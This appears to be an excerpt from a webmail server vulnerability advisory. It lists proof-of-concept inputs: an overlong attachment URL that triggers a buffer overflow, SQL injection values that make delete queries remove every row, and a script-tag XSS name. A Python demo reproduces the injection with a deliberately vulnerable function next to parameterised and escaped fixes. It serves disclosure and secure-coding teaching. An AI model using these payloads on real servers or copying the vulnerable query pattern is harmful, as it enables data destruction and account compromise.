Test code
1) http://[hostname]/mail/download.asp?urlOfAttach=/maildata/A..[approx 290 bytes]..A
   sprintf(buffer, "%s%s", "C:\\CMAILS~1", "/maildata/A....A");
2) sql = "delete from mailfolder where account= '" & Session("Account") & "' and uid = '" & arrString(i) & "'"
   indexOfMail=user2.xxx.yyy.com.cmailserver.3'%20or%20'1'='1%3B
3) strSql = "delete from address where account= '" & Session("Account") & "' and addressid = " & arrString(nI)
   indexOfMail=5%20or%201=1%3B
For example, the user may set his name to <script>alert('XSS');</script>
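As an added example (not code from the original advisory or from the mail server it describes), the following Python script reproduces the string-concatenation pattern of items 2 and 3 against a constructed in-memory SQLite table, shows what the item 3 input does to such a query, and puts the type-checked, parameterised form beside it; it also escapes the user-controlled display name from item 4 before it would be placed in HTML. The table name and the `5 or 1=1;` input come from the page; the rows, account names and function names are assumptions made for the demonstration.

```python
import html
import sqlite3


def build_db():
    """Constructed stand-in for the server's address table; not the product's real schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE address (account TEXT, addressid INTEGER)")
    conn.executemany(
        "INSERT INTO address VALUES (?, ?)",
        [("alice", 5), ("alice", 6), ("bob", 7)],  # assumed sample rows
    )
    conn.commit()
    return conn


def count_rows(conn):
    return conn.execute("SELECT count(*) FROM address").fetchone()[0]


def delete_address_vulnerable(conn, account, addressid):
    """Mirrors the page's item 3: the request value is spliced into the SQL text."""
    sql = ("delete from address where account= '" + account
           + "' and addressid = " + addressid)
    conn.execute(sql)
    conn.commit()


def delete_address_hardened(conn, account, addressid):
    """Reject anything that is not an integer, then bind the value as a parameter.

    A bound parameter is sent as data, so it can never extend the WHERE clause;
    the type check additionally turns a malformed request into a clear error.
    """
    if not addressid.isdigit():
        raise ValueError("addressid must be a non-negative integer")
    conn.execute(
        "delete from address where account = ? and addressid = ?",
        (account, int(addressid)),
    )
    conn.commit()


def render_display_name(name):
    """Escape the user-controlled name before it is placed in HTML (the page's item 4)."""
    return html.escape(name, quote=True)


def demo():
    payload = "5 or 1=1;"  # the page's item 3 input, URL-decoded
    results = {}

    # Concatenation: AND binds tighter than OR, so the query becomes
    # (account='alice' and addressid=5) or 1=1 and every row goes.
    conn = build_db()
    delete_address_vulnerable(conn, "alice", payload)
    results["vulnerable_rows_left"] = count_rows(conn)  # 0

    # Hardened: the same input is rejected before any SQL runs.
    conn = build_db()
    try:
        delete_address_hardened(conn, "alice", payload)
    except ValueError:
        pass
    results["hardened_rows_left"] = count_rows(conn)  # 3

    # Hardened with a legitimate value: only alice's addressid 5 is removed.
    conn = build_db()
    delete_address_hardened(conn, "alice", "5")
    results["hardened_valid_rows_left"] = count_rows(conn)  # 2

    results["escaped_name"] = render_display_name("<script>alert('XSS');</script>")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

The same two changes apply to item 2: bind `uid` as a parameter instead of concatenating `arrString(i)`, and validate its shape before the query runs. In classic ASP this means an ADODB.Command with a Parameters collection rather than building the statement as a string.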